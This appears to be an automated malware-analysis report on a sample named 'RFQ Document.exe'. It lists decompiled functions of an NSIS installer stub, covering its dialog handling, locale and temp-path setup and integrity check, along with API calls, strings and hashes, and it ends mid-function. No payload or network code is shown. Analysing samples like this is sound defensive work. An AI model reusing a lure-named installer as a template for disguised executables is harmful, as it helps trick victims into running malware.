Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA

Uniqueness

Uniqueness Score: -1.00%

Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "iqbk Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x004039b9
0x004039c2
0x00403b03
0x00403b07
0x00403b0b
0x00403b0d
0x00403b12
0x00403b1d
0x00403b28
0x00403b2d
0x00403b2f
0x00403b31
0x00403b34
0x00403b39
0x00403b47
0x00403b54
0x00403b5b
0x00403b5b
0x00403b5c
0x00403b5c
0x00403b61
0x00403b67
0x00403b6e
0x00403b74
0x00403b76
0x00403bb6
0x00403bbb
0x00403bc0
0x00403bc0
0x00403bc5
0x00403bce
0x00403bd0
0x00403bd5
0x00403bdb
0x00403bdf
0x00403bdf
0x00403be4
0x00403bea
0x00000000
0x00000000
0x00403bf0
0x00403bf5
0x00403bfb
0x00000000
0x00000000
0x00403c04
0x00403c0c
0x00403c11
0x00403c14
0x00403c1a
0x00403c1f
0x00403c22
0x00403c28
0x00403c2d
0x00403c30
0x00403c36
0x00403c3e
0x00403c44
0x00403c4a
0x00403c4e
0x00403c55
0x00403c55
0x00403c55
0x00403c5f
0x00403c71
0x00403c7d
0x00403c82
0x00403c8c
0x00403c92
0x00403c94
0x00403c99
0x00403c96
0x00403c96
0x00403c96
0x00403ca9
0x00403cc1
0x00403cc3
0x00403cc9
0x00403cde
0x00403ccb
0x00403cd4
0x00403cd6
0x00403cd6
0x00403ce4
0x00403cf4
0x00403d05
0x00403d0c
0x00403d12
0x00403d16
0x00403d1b
0x00403d1d
0x00000000
0x00403d23
0x00403d23
0x00403d25
0x00000000
0x00000000
0x00403d2b
0x00403d2f
0x00403d54
0x00403d5a
0x00403d60
0x00403d62
0x00000000
0x00000000
0x00403d88
0x00403d8e
0x00403d90
0x00403d95
0x00000000
0x00000000
0x00403d9b
0x00403d9e
0x00403da1
0x00403db8
0x00403dc4
0x00403ddd
0x00403de3
0x00403de7
0x00403dec
0x00403df2
0x00000000
0x00000000
0x00403dfc
0x00403e07
0x00000000
0x00403e07
0x00403d31
0x00403d37
0x00000000
0x00000000
0x00403d3d
0x00403d43
0x00000000
0x00000000
0x00000000
0x00403d49
0x00403d1d
0x00403e14
0x00403e20
0x00403e27
0x00000000
0x00403b78
0x00403b78
0x00403b7b
0x00403bae
0x00403bae
0x00403bb0
0x00000000
0x00000000
0x00000000
0x00403bb0
0x00403b7d
0x00403b81
0x00403b86
0x00403b88
0x00000000
0x00000000
0x00403b98
0x00403ba0
0x00000000
0x00403ba6
0x004039d4
0x004039d4
0x004039d8
0x004039dd
0x004039ec
0x004039ec
0x004039f5
0x004039fe
0x00403a09
0x00403a09
0x00403a15
0x00403a31
0x00403a34
0x00403a47
0x00403a4d
0x00403af0
0x00000000
0x00403af9
0x00403a53
0x00403a60
0x00403a62
0x00403a64
0x00403a83
0x00403a83
0x00403a86
0x00403a8b
0x00403a8e
0x00403a9e
0x00403a9f
0x00403aa1
0x00403ad7
0x00403aea
0x00000000
0x00403aea
0x00403aa3
0x00403aa9
0x00403ac2
0x00403ac7
0x00403ac9
0x00000000
0x00000000
0x00403acb
0x00403ab7
0x00403ab7
0x00403ab9
0x00403ab9
0x00000000
0x00403ab9
0x00403aac
0x00403ab1
0x00000000
0x00403ab1
0x00403a90
0x00403a96
0x00000000
0x00000000
0x00403a98
0x00000000
0x00403a98
0x00403a88
0x00000000
0x00403a88
0x00403a6e
0x00403a75
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00000000
0x00403a7d
0x00403a39
0x00000000
0x00403a17
0x00403a1d
0x00403a27
0x00403e2d
0x00403e33
0x00403e35
0x00403e3b
0x00403e40
0x00403e46
0x00403e46
0x00403e3b
0x00403e50
0x00000000
0x00403e50
0x00403a15

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
ShowWindow.USER32(?), ref: 00403A09
DestroyWindow.USER32 ref: 00403A1D
SetWindowLongA.USER32 ref: 00403A39
GetDlgItem.USER32 ref: 00403A5A
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
IsWindowEnabled.USER32(00000000), ref: 00403A75
GetDlgItem.USER32 ref: 00403B23
GetDlgItem.USER32 ref: 00403B2D
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
GetDlgItem.USER32 ref: 00403C3E
ShowWindow.USER32(00000000,?), ref: 00403C5F
EnableWindow.USER32(?,?), ref: 00403C71
EnableWindow.USER32(?,?), ref: 00403C8C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
EnableMenuItem.USER32 ref: 00403CA9
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,iqbk Setup), ref: 00403CFD
SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
ShowWindow.USER32(?,0000000A), ref: 00403E40

Strings

iqbk Setup, xrefs: 00403CEE

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
String ID: iqbk Setup
API String ID: 4050669955-395158684
Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040361A, Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x764fc8
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x76a73c
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x54
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403620
0x00403629
0x00403630
0x00403632
0x00403646
0x00403658
0x00403662
0x00403667
0x0040366d
0x00403680
0x00403680
0x0040368b
0x00403634
0x0040363f
0x0040363f
0x00403690
0x00403695
0x0040369a
0x004036a3
0x004036a8
0x004036b9
0x00403740
0x00403748
0x00403751
0x00403751
0x00403767
0x0040376d
0x0040377b
0x0040380a
0x00403812
0x0040381c
0x00403821
0x00403827
0x004038b1
0x004038b6
0x004038b8
0x004038d4
0x00000000
0x004038d4
0x004038ba
0x004038c0
0x004038c8
0x004038c8
0x00000000
0x004038c0
0x00403835
0x00403840
0x00403845
0x00403847
0x0040384e
0x0040384e
0x00403859
0x00403861
0x00403863
0x00403865
0x0040386e
0x00403871
0x00403877
0x00403877
0x0040387d
0x00403896
0x004038a7
0x00000000
0x004038ac
0x00403814
0x00403816
0x00000000
0x00403781
0x00403781
0x00403787
0x00403791
0x00403799
0x004037a3
0x004037a9
0x004037b7
0x004038d9
0x004038d9
0x00000000
0x004038d9
0x004037bd
0x004037c6
0x00403805
0x00000000
0x00403805
0x004036bf
0x004036bf
0x004036c4
0x00000000
0x00000000
0x004036c9
0x004036ce
0x004036de
0x004036e3
0x004036ea
0x00000000
0x00000000
0x004036ee
0x004036f0
0x004036fd
0x004036fd
0x00403705
0x0040370b
0x00403733
0x0040373b
0x00000000
0x0040371d
0x0040371e
0x00403727
0x0040372d
0x0040372e
0x00000000
0x0040372e
0x00403729
0x0040372b
0x00000000
0x00000000
0x00000000
0x0040372b
0x0040370b

APIs

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ Document.exe" ,00000000), ref: 0040368B
lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
LoadImageA.USER32 ref: 00403767

Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32

RegisterClassA.USER32 ref: 004037AE
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
CreateWindowExA.USER32 ref: 004037FF
ShowWindow.USER32(00000005,00000000), ref: 00403835
GetClassInfoA.USER32 ref: 00403861
GetClassInfoA.USER32 ref: 0040386E
RegisterClassA.USER32 ref: 00403877
DialogBoxParamA.USER32 ref: 00403896

Strings

RichEdit, xrefs: 00403868
_Nb, xrefs: 004037BD, 004037C2
Control Panel\Desktop\ResourceLocale, xrefs: 0040364E
.exe, xrefs: 0040370D
C:\Users\user\AppData\Local\Temp, xrefs: 0040369A, 004036A2, 0040373A, 00403740, 00403750
RichEd32, xrefs: 00403849
TclpOwkq, xrefs: 004036CE, 004036D6, 004036E3, 0040372D, 00403733
1033, xrefs: 0040363A, 00403686
RichEd20, xrefs: 0040383B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403626
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 0040361E
.DEFAULT\Control Panel\International, xrefs: 00403676
RichEdit20A, xrefs: 00403859, 0040385F

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\RFQ Document.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb
API String ID: 1975747703-3640999715
Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\RFQ Document.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\RFQ Document.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E00405BC7("C:\\Users\\jones\\Desktop", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0xc200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0xc200
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0xc200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0xc200
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
